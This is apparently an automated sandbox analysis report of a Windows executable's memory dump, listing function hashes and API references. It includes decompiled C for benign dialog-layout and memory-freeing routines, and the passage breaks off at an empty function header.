Instruction ID: 99b27ca630677af23c9e90568cb74bf1f342f49d77cdd8a66f5d3da33ff680fa
Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
Instruction Fuzzy Hash: 73918FF42043458BDB28EF68D895BBE73C5AF62304F540A2DF5A787282DB74E648C752

Uniqueness

Uniqueness Score: -1.00%

Function 001B3EE9, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1913bd64f26aac9cfa2f663e18ba509569766f0696d194a7c1a53adaca9f3dea
Instruction ID: 9277d063f858fe493977ba40b0eb1d2edf145be5bc4dd962042163fb5bcf741f
Opcode Fuzzy Hash: 1913bd64f26aac9cfa2f663e18ba509569766f0696d194a7c1a53adaca9f3dea
Instruction Fuzzy Hash: 4E614771E0070867DE38A9288891BFE63B8DF55740F10851EF6A3DB2C3D711EFA68256

Uniqueness

Uniqueness Score: -1.00%

Function 001A397F, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
Instruction ID: 9bcc419ff397425734288ee2e8231b7aafa1b172b6b0842beae3c70ab49dcacd
Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
Instruction Fuzzy Hash: 487148753043464BDB34DF68C8D0BBD7791ABA2304F14492DF9D68B282DBB49A89C762

Uniqueness

Uniqueness Score: -1.00%

Function 001B3CBA, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 910d7d896e8262a01b75460df016e75a16e4d354ff904d2914b7014f46574af7
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 66518E31600A8457DF3855EC85A6BFFA7C99B16740F98091AE872CB282CB15EF75C361

Uniqueness

Uniqueness Score: -1.00%

Function 0019DADD, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e355695c3eef1757d21f8da3be972c2a5e31d062b7698fdac0661cff4f10ee
Instruction ID: 142fd21fdd1a6d65c22d6378a5d89c39bdc29c7a3773b8eacec63b53c51937dc
Opcode Fuzzy Hash: c8e355695c3eef1757d21f8da3be972c2a5e31d062b7698fdac0661cff4f10ee
Instruction Fuzzy Hash: 2F81B19211B2E4AECB0A8F3D38A02E53FA25773341B1D44FBC4C987AA7C17655D8C761

Uniqueness

Uniqueness Score: -1.00%

Function 0019E510, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb39e829aafaef9f2e806d81df2dbd44cf3b5e22230e3ebc8fc1f5f5eb0825e4
Instruction ID: d176c20cbc282d40ccec1c8647290956f21724d70f72dfa5430c3a5c68aeb510
Opcode Fuzzy Hash: cb39e829aafaef9f2e806d81df2dbd44cf3b5e22230e3ebc8fc1f5f5eb0825e4
Instruction Fuzzy Hash: 6251D43590C3914FCB12CF25D18446EBFE1AFAA318F5A489EE4D54B252D231E689CB53

Uniqueness

Uniqueness Score: -1.00%

Function 0019F5C5, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d562ddd36fd66a8c99a66b0e650dd6a9197c5a6c47287b97ee4214c0ed9a1c
Instruction ID: 2ee86f0c112ddcbc42cb1282aef7ebe82ed261e99591d83a48487c040f587ff8
Opcode Fuzzy Hash: f7d562ddd36fd66a8c99a66b0e650dd6a9197c5a6c47287b97ee4214c0ed9a1c
Instruction Fuzzy Hash: BA5126B1A083029FC748CF19D49059AF7E1FF88314F054A2EE899E7740DB34E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001A33D3, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
Instruction ID: ca02e692ddc4ce8356edead9d5f2fc93e8b17d619fbcf28ce5e8a4fc87866043
Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
Instruction Fuzzy Hash: 3431D2B56047158FCB14DE28C85126AFBD0FB9A300F54492DF9D9D7741C778EA0ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00195D7E, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe8f01587c29341b778a277d08c93f31fe1cbfa12441091232d12269779c87a
Instruction ID: b3eefc39634833815d7a78feb582b3e2d1d93146be3715f6646aa376010271d0
Opcode Fuzzy Hash: efe8f01587c29341b778a277d08c93f31fe1cbfa12441091232d12269779c87a
Instruction Fuzzy Hash: 0321AA31A201614BCF09CF6DDCA087A7B92A74630134A812FEE46DF791C635E965C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0019D70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0019D70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00193E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E001A11FA( &_v2208,  &_v2288, 0x50);
				_t96 = E001B2BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0x1cd5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E0019CD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E0019CE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x1cdfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0x1cdfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0x1cd154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0x1c33e0
							_t150 = E001B5460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0x1c33e0
								if(E0019CF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0x1cd5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}

0x0019d723
0x0019d72d
0x0019d731
0x0019d736
0x0019d748
0x0019d752
0x0019d757
0x0019d75e
0x0019d761
0x0019d765
0x0019d76b
0x0019d7c8
0x0019d7e0
0x0019d7e8
0x0019d7ec
0x0019d7f8
0x0019d80a
0x0019d811
0x0019d815
0x0019d818
0x0019d820
0x0019d826
0x0019d82c
0x0019d8cd
0x0019d8cd
0x0019d8d5
0x0019d906
0x0019d906
0x0019d90c
0x0019d917
0x0019d919
0x0019d91f
0x0019d921
0x0019d927
0x0019d9d9
0x0019d9d9
0x0019d9d9
0x0019d92d
0x0019d9c7
0x0019d934
0x0019d93a
0x00000000
0x00000000
0x0019d946
0x0019d950
0x0019d965
0x0019d96a
0x0019d96d
0x0019d983
0x0019d98b
0x0019d98d
0x0019d98e
0x0019d996
0x0019d9a8
0x0019d9af
0x0019d9b8
0x0019d9be
0x0019d9c0
0x0019d9c4
0x00000000
0x00000000
0x0019d9c6
0x0019d9c6
0x0019d9c6
0x00000000
0x0019d9c7
0x0019d83a
0x00000000
0x00000000
0x0019d847
0x0019d848
0x0019d851
0x0019d856
0x0019d85c
0x0019d860
0x0019d861
0x0019d867
0x0019d871
0x0019d878
0x0019d881
0x0019d885
0x0019d889
0x0019d88b
0x0019d88b
0x0019d88f
0x0019d891
0x0019d891
0x0019d8b7
0x0019d8c3
0x0019d8c9
0x00000000
0x0019d76d
0x0019d76d
0x0019d772
0x0019d775
0x0019d778
0x0019d780
0x0019d785
0x0019d78a
0x0019d79b
0x0019d7a5
0x0019d7b2
0x0019d7b2
0x0019d7a5
0x0019d7b8
0x0019d7b8
0x0019d7bc
0x0019d7bd
0x0019d7c0
0x0019d7c0
0x00000000
0x0019d772

APIs

_swprintf.LIBCMT ref: 0019D731

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

Part of subcall function 001A11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,001D0078,?,0019CE91,00000000,?,00000050,001D0078), ref: 001A1217

_strlen.LIBCMT ref: 0019D752
SetDlgItemTextW.USER32(?,001CD154,?), ref: 0019D7B2
GetWindowRect.USER32(?,?), ref: 0019D7EC
GetClientRect.USER32(?,?), ref: 0019D7F8
GetWindowLongW.USER32(?,000000F0), ref: 0019D896
GetWindowRect.USER32(?,?), ref: 0019D8C3
SetWindowTextW.USER32(?,?), ref: 0019D906
GetSystemMetrics.USER32(00000008), ref: 0019D90E
GetWindow.USER32(?,00000005), ref: 0019D919
GetWindowRect.USER32(00000000,?), ref: 0019D946
GetWindow.USER32(00000000,00000002), ref: 0019D9B8

Strings

CAPTION, xrefs: 0019D8E8
d, xrefs: 0019D818
$%s:, xrefs: 0019D725

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: ccc7566c2707d206c9ba24c6616f181b0597281feffb1b12d143780c790b46df
Instruction ID: afa1dc89bc43ba8809cd4f407a07ddd1fefeae6021d9b6459f25020fb44cecb6
Opcode Fuzzy Hash: ccc7566c2707d206c9ba24c6616f181b0597281feffb1b12d143780c790b46df
Instruction Fuzzy Hash: E9818E72508341AFDB10DFA8ED85F6FBBE9EB88704F04092DFA8593291D770E8058B52

Uniqueness

Uniqueness Score: -1.00%

Function 001BB784, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BB784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1cdd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E001B7A50(_t46);
							E001BB363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E001B7A50(_t47);
							E001BB461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E001B7A50( *((intOrPtr*)(_t74 + 0x7c)));
						E001B7A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E001B7A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E001B7A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E001B7A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E001B7A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E001BB8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1cd818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E001B7A50(_t31);
							E001B7A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E001B7A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E001B7A50(_t74);
			}

0x001bb78c
0x001bb790
0x001bb798
0x001bb7a1
0x001bb7a6
0x001bb7ad
0x001bb7b5
0x001bb7bd
0x001bb7c8
0x001bb7ce
0x001bb7cf
0x001bb7d7
0x001bb7df
0x001bb7ea
0x001bb7f0
0x001bb7f4
0x001bb7ff
0x001bb805
0x001bb7a6
0x001bb806
0x001bb80e
0x001bb821
0x001bb834
0x001bb842
0x001bb84d
0x001bb852
0x001bb85b
0x001bb863
0x001bb864
0x001bb86a
0x001bb86d
0x001bb870
0x001bb877
0x001bb879
0x001bb87d
0x001bb885
0x001bb88c
0x001bb892
0x001bb893
0x001bb893
0x001bb89a
0x001bb89c
0x001bb8a1
0x001bb8a9
0x001bb8ae
0x001bb8af
0x001bb8af
0x001bb8b2
0x001bb8b5
0x001bb8b8
0x001bb8bb
0x001bb8bb
0x001bb8cd

APIs

___free_lconv_mon.LIBCMT ref: 001BB7C8

Part of subcall function 001BB363: _free.LIBCMT ref: 001BB380
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB392
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3A4
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3B6
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3C8
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3DA
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3EC
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3FE
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB410
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB422
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB434
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB446
Part of subcall function 001BB363: _free.LIBCMT ref: 001BB458

_free.LIBCMT ref: 001BB7BD

Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78

_free.LIBCMT ref: 001BB7DF
_free.LIBCMT ref: 001BB7F4
_free.LIBCMT ref: 001BB7FF
_free.LIBCMT ref: 001BB821
_free.LIBCMT ref: 001BB834
_free.LIBCMT ref: 001BB842
_free.LIBCMT ref: 001BB84D
_free.LIBCMT ref: 001BB885
_free.LIBCMT ref: 001BB88C
_free.LIBCMT ref: 001BB8A9
_free.LIBCMT ref: 001BB8C1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ed87088c743111e308c38677a5d7d4ec174a644b793c54a538ef62f9b31cd17e
Instruction ID: 0f26012a9ff03bbd2029ea5762c57d5c50b7f450e0145dcc5cd44fe114a600ce
Opcode Fuzzy Hash: ed87088c743111e308c38677a5d7d4ec174a644b793c54a538ef62f9b31cd17e
Instruction Fuzzy Hash: C2316D316087009FEB20AA79D885BDBB3E8EF90350F145429F05AE7591DFB1ED80CB24

Uniqueness

Uniqueness Score: -1.00%

Function 001AC343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AC343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E001AD940();
				_t10 = E001A952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E001A1410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E001A958C(_v20);
							SendMessageW(_t34, 0x172, 0, E001A975D(_t29, _t45, _t28, E001A9549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x001ac343
0x001ac343
0x001ac34b
0x001ac350
0x001ac357
0x001ac42e
0x001ac42e
0x001ac364
0x001ac36a
0x001ac36c
0x001ac36e
0x001ac373
0x001ac429
0x00000000
0x001ac42a
0x001ac37a
0x001ac393
0x001ac3ac
0x001ac3ce
0x001ac3d2
0x001ac3db
0x001ac3e4
0x001ac402
0x001ac409
0x001ac409
0x001ac3d2
0x001ac412
0x001ac418
0x001ac41d
0x001ac41f
0x001ac422
0x00000000
0x00000000
0x001ac422
0x00000000
0x001ac41d
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 001AC364
GetClassNameW.USER32(00000000,?,00000800), ref: 001AC393

Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426

GetWindowLongW.USER32(00000000,000000F0), ref: 001AC3B1
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001AC3C8
GetObjectW.GDI32(00000000,00000018,?), ref: 001AC3DB

Part of subcall function 001A958C: GetDC.USER32(00000000), ref: 001A9598
Part of subcall function 001A958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A95A7
Part of subcall function 001A958C: ReleaseDC.USER32(00000000,00000000), ref: 001A95B5

Part of subcall function 001A9549: GetDC.USER32(00000000), ref: 001A9555
Part of subcall function 001A9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 001A9564
Part of subcall function 001A9549: ReleaseDC.USER32(00000000,00000000), ref: 001A9572

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001AC402
DeleteObject.GDI32(00000000), ref: 001AC409
GetWindow.USER32(00000000,00000002), ref: 001AC412

Strings

STATIC, xrefs: 001AC399

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 5b66441cb51f1f3c2f01ce75b62a65a38e4b276d19edfcd99f4eeef621775f02
Instruction ID: 33b85bd8395a0e3c7c5173545bf91acdadeb07aaae74dedbfecb7476298470f1
Opcode Fuzzy Hash: 5b66441cb51f1f3c2f01ce75b62a65a38e4b276d19edfcd99f4eeef621775f02
Instruction Fuzzy Hash: 4821D8765402147BEB216B64DC56FEF7B6CAF1A710F008021FA01B6091CB748E8287E4

Uniqueness

Uniqueness Score: -1.00%

Function 001B8422, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

